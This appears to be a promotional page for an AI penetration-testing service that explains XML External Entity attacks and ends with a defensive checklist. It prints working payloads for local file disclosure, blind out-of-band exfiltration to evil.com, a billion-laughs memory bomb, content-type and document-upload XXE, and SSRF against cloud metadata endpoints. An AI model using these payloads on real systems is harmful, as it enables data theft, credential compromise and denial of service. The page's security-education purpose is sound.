XML External Entity (XXE) Testing
Your XML Parser Just Read Your Password File.

Here is something that might surprise you: that innocent-looking XML file your application just processed? It could have instructed your server to read /etc/passwd, scan your internal network, or even crash your entire system. An XML External Entity attack does not need a sophisticated exploit. Just a few lines of XML and a misconfigured parser. The scary part? Most developers have never even heard of it.

* Run instant security penetration test on your domain.

THE PROBLEM

Is Your Application Blindly Trusting XML Input?

Let me ask you something. Your application accepts XML data, maybe from an API, a file upload, or a SOAP web service. You validate the schema. You check that the fields make sense. You feel pretty good about your input validation. But here is the thing: you are probably not validating the most dangerous part of XML.

The Document Type Definition (DTD) sits at the top of an XML file, and it can contain entity declarations that point to external resources. When your parser processes these entities, it obediently fetches whatever they point to. A local file. An internal URL. A massive recursive structure that consumes all your memory. This is the XML External Entity XXE attack, and your parser is doing exactly what it was told to do.

The vulnerability was serious enough that it had its own category in the OWASP Top 10 2017 before being merged into Security Misconfiguration in 2021. It affects applications built in Java, .NET, PHP, Python, and nearly every other language with XML parsing capabilities.

Think your application is immune?

PentestMate's AI agents find these flaws in 87% of the apps we test.

Test My App
WHAT WE HUNT

What Our AI Agents Look For

Unlike automated scanners that look for code signatures, our agents understand your business logic and test it like a real attacker would.

Classic File Disclosure

CRITICAL

The attacker defines an external entity pointing to a local file like /etc/passwd or application configuration files. When the XML is parsed, the file contents are included in the response, exposing sensitive data.

Server-Side Request Forgery via XXE

CRITICAL

Instead of reading local files, the attacker points entities to internal URLs. This turns your server into a proxy, allowing them to scan internal networks, access cloud metadata endpoints, or hit internal APIs.

Billion Laughs DoS Attack

HIGH

Also known as an XML bomb, this attack uses nested entity references that expand exponentially. A few kilobytes of XML can expand to gigabytes in memory, crashing your application or server.

Blind XXE with Out-of-Band Exfiltration

CRITICAL

When error messages are suppressed, attackers use parameter entities to exfiltrate data through DNS lookups or HTTP requests to their own server. The data leaves your network without appearing in any response.

XXE via Modified Content Types

HIGH

Applications that accept JSON sometimes also accept XML when the Content-Type header is changed. Attackers send XML payloads to JSON endpoints, exploiting hidden XML parser functionality.

XXE in Document Processors

MEDIUM

Office documents (DOCX, XLSX) and SVG images are XML-based. Applications that process these files can be vulnerable to XXE when the XML content is parsed without proper security configuration.

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

OWASP Foundation(XXE Prevention Cheat Sheet)
DEEP DIVE

Understanding the XML External Entity XXE Attack in Depth

XXE is one of those vulnerabilities that looks almost too simple to be dangerous. But simplicity is exactly what makes it so effective. Let me walk you through exactly how these attacks work and why they are so hard to catch without specialized testing.

The Classic XXE: Reading System Files

This is the textbook XML External Entity attack. The attacker submits an XML document with a custom DTD that defines an entity pointing to a local file. When your parser encounters the entity reference, it reads the file and includes its contents in the document.

classic-xxe-file-disclosure.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

<!-- The parser reads /etc/passwd and substitutes it for &xxe; -->

<!-- Server response might include: -->
<foo>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...</foo>

<!-- Attacker now has your system users list -->
<!-- Next targets: /etc/shadow, application config files,
     database credentials, API keys... -->

This works because XML parsers are designed to resolve external entities by default. The parser is not broken - it is doing exactly what the XML specification says. The vulnerability is in trusting user-controlled XML without disabling dangerous features.

Blind XXE: Exfiltrating Data When You Cannot See Responses

What if the application does not return the XML content in its response? Attackers use a technique called out-of-band (OOB) exfiltration. They host a malicious DTD on their server and use parameter entities to send your data to themselves.

blind-xxe-oob-exfiltration.xml
<!-- Attacker hosts this DTD on their server: evil.com/xxe.dtd -->
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?data=%file;'>">
%eval;
%exfil;

<!-- Payload sent to vulnerable application -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">
  %xxe;
]>
<foo>test</foo>

<!-- What happens: -->
<!-- 1. Parser fetches the DTD from attacker's server -->
<!-- 2. DTD reads /etc/hostname into %file -->
<!-- 3. %eval constructs an entity that makes HTTP request -->
<!-- 4. %exfil sends the file contents to attacker's server -->

<!-- Attacker's server log shows: -->
<!-- GET /?data=production-web-server-01 HTTP/1.1 -->
<!-- Data exfiltrated - no visible response to victim -->

Blind XXE is particularly dangerous because there is no indication in the application response that anything went wrong. The data silently leaves your network. PentestMate deploys callback servers to detect these attacks by monitoring for out-of-band connections.

The Billion Laughs Attack: XML Bomb Denial of Service

This attack, documented on Wikipedia, uses exponentially expanding entities to consume all available memory. A 1KB XML file can expand to several gigabytes, crashing your application or bringing down the entire server.

billion-laughs-xml-bomb.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

<!-- Each level expands 10x the previous level -->
<!-- lol9 references lol8 ten times -->
<!-- lol8 references lol7 ten times, and so on -->

<!-- Result: 10^9 = 1,000,000,000 "lol" strings -->
<!-- Original: ~1KB XML -->
<!-- Expanded: ~3GB in memory -->
<!-- Outcome: Application crash, potential server crash -->

This attack does not even require network access or external entities. It uses only internal entities, making it harder to block with simple firewall rules. Proper parser configuration is the only reliable defense.

XXE via Content-Type Confusion

Here is something most developers do not realize: many frameworks that accept JSON will also parse XML if you change the Content-Type header. That JSON API you thought was safe? An attacker can send XML and trigger XXE vulnerabilities you did not know existed.

content-type-xxe-attack.http
// Normal JSON request to your API
POST /api/user HTTP/1.1
Content-Type: application/json

{"username": "john", "email": "john@example.com"}

// Attacker's XXE attempt via Content-Type manipulation
POST /api/user HTTP/1.1
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///app/config/database.yml">
]>
<user>
  <username>&xxe;</username>
  <email>attacker@evil.com</email>
</user>

// If your framework auto-detects content type:
// - Express.js with body-parser configured for both
// - Spring with multiple message converters
// - Many API frameworks by default
// The XML is parsed, XXE is triggered

// Your JSON validation never runs
// XML parser processes the malicious DTD
// Database credentials now in attacker's hands

This is why PentestMate tests every endpoint with multiple content types. Your application might be processing XML in places you never intended.

XXE in File Uploads: Weaponizing Documents

Office documents (DOCX, XLSX, PPTX), SVG images, and many other formats are actually ZIP archives containing XML files. If your application extracts and processes these files without securing the XML parser, attackers can embed XXE payloads inside seemingly innocent documents.

document-xxe-attacks.sh
# Office documents (DOCX, XLSX, PPTX) are ZIP files
# containing XML content

$ unzip -l resume.docx
Archive:  resume.docx
  Length     Name
---------  ----
     1312  [Content_Types].xml
      590  _rels/.rels
     2156  word/document.xml    # Main document content
      817  word/_rels/document.xml.rels
     2456  word/styles.xml

# Attacker modifies word/document.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>
  <body>
    <p>Dear Hiring Manager,</p>
    <p>&xxe;</p>  <!-- XXE payload -->
  </body>
</document>

# SVG images are also XML:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///app/.env">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>

# When your document processor or image resizer
# parses these, XXE is triggered

If your application processes document uploads, image conversions, or any file format that contains XML internally, you need to ensure every XML parser in your processing pipeline has external entities disabled.

SSRF via XXE: Scanning Your Internal Network

When an attacker cannot read local files (maybe file:// URLs are blocked), they can still use XXE to make HTTP requests to internal services. This turns your server into a proxy for attacking your own infrastructure.

xxe-ssrf-internal-scanning.xml
<!-- Using XXE to scan internal network -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.1:8080/">
]>
<foo>&xxe;</foo>

<!-- If the port is open, response might include HTML content -->
<!-- If closed, error message reveals timing information -->

<!-- Scanning for internal services: -->
<!ENTITY xxe SYSTEM "http://internal-admin.company.local/">
<!ENTITY xxe SYSTEM "http://10.0.0.5:9200/"> <!-- Elasticsearch -->
<!ENTITY xxe SYSTEM "http://10.0.0.6:6379/"> <!-- Redis -->
<!ENTITY xxe SYSTEM "http://localhost:8500/v1/agent/self"> <!-- Consul -->

<!-- Cloud metadata endpoints are prime targets: -->
<!-- AWS -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

<!-- GCP -->
<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/">

<!-- Azure -->
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/instance">

<!-- These endpoints expose instance credentials, API tokens,
     and configuration - often without authentication -->

XXE-based SSRF is particularly dangerous in cloud environments. Access to the metadata endpoint can provide temporary credentials with significant privileges. Combined with other vulnerabilities, this can lead to complete infrastructure compromise.

Still reading? Good. That means you care about security.

Most people would've clicked away by now. Let PentestMate find out if your application has these vulnerabilities - before someone else does.

HOW PENTESTMATE HELPS

Stop Reading About Vulnerabilities.
Start Finding Them.

Everything you have read above? Our AI agents test for all of it - automatically, continuously, and without you lifting a finger.

Comprehensive Parser Testing

Our AI agents test XML endpoints with multiple attack vectors, including classic file disclosure, blind XXE with OOB callbacks, and entity expansion attacks. We test what your parser actually does, not what you think it does.

Continuous XXE Monitoring

New XML processing code can introduce XXE vulnerabilities at any time. PentestMate continuously tests your endpoints, catching misconfigurations before attackers do.

Out-of-Band Detection

For blind XXE vulnerabilities where data does not appear in responses, we deploy callback servers that detect when your parser makes external connections, proving the vulnerability exists.

See It In Action

Start with a $1 trial - full access to all PentestMate AI-powered security testing

SECURITY CHECKLIST

Quick Business Logic Security Checklist

Use this as a starting point. If you're missing even one of these, you have a problem.

Parser Configuration

  • Disable external entity processing completely
  • Disable DTD processing if not required
  • Use defusedxml or similar secure libraries
  • Configure entity expansion limits
  • Disable XInclude processing

Input Validation

  • Validate Content-Type headers strictly
  • Reject unexpected XML in JSON endpoints
  • Sanitize XML before processing
  • Implement allowlist for expected XML structure
  • Log and alert on DTD declarations in input

File Upload Security

  • Scan document uploads for XXE payloads
  • Configure document processors securely
  • Validate SVG and other XML-based images
  • Use isolated environments for processing
  • Strip or regenerate document metadata

Defense in Depth

  • Block outbound connections from XML parsers
  • Restrict file system access for parser processes
  • Monitor for unusual DNS lookups
  • Implement network segmentation
  • Use WAF rules for common XXE patterns

Not sure if your system passes all these checks? Let PentestMate's AI agents find out for you.

Run Automated Security Testing
REAL INCIDENTS

Real-World Business Logic Breaches

These aren't hypotheticals. These are real companies that got burned by the exact vulnerabilities we've discussed:

Documented XXE Attack Vectors

According to OWASP, XXE can lead to file disclosure, SSRF, denial of service, and in some configurations, remote code execution

What happened: XML External Entity vulnerabilities have been found in major enterprise software including Java-based applications, .NET frameworks, and document processing systems

Lesson: The vulnerability is not theoretical. It had its own category in OWASP Top 10 2017 (A4) before being merged into Security Misconfiguration (A05) in 2021. Source: OWASP Foundation

Jolokia API XXE (CVE-2018-1000130)

Attackers could reload logging configurations from external URLs, potentially leading to arbitrary file reads and SSRF

What happened: The Jolokia JMX-HTTP bridge contained an XXE vulnerability in its reloadByURL action that allowed processing of external XML

Lesson: Even security-focused APIs can contain XXE vulnerabilities. The fix required disabling external entity processing in the XML parser. Source: Acunetix and NVD

GET STARTED IN 2 MINUTES

Is Your XML Parser Exposing Your Infrastructure?

Every XML endpoint, SOAP service, file upload, and document processor is a potential XXE attack surface. Our AI agents probe your parsers with classic file disclosure payloads, blind XXE with callback detection, and entity expansion attacks. We find the XML processing vulnerabilities hiding in your application before attackers use them to read your configuration files, scan your network, or crash your servers.

* Run instant security penetration test on your domain.

3-day trial for just $1
Cancel anytime
Full vulnerability report

Related Security Tests

Explore more security testing capabilities on our main site.

Back to PentestMate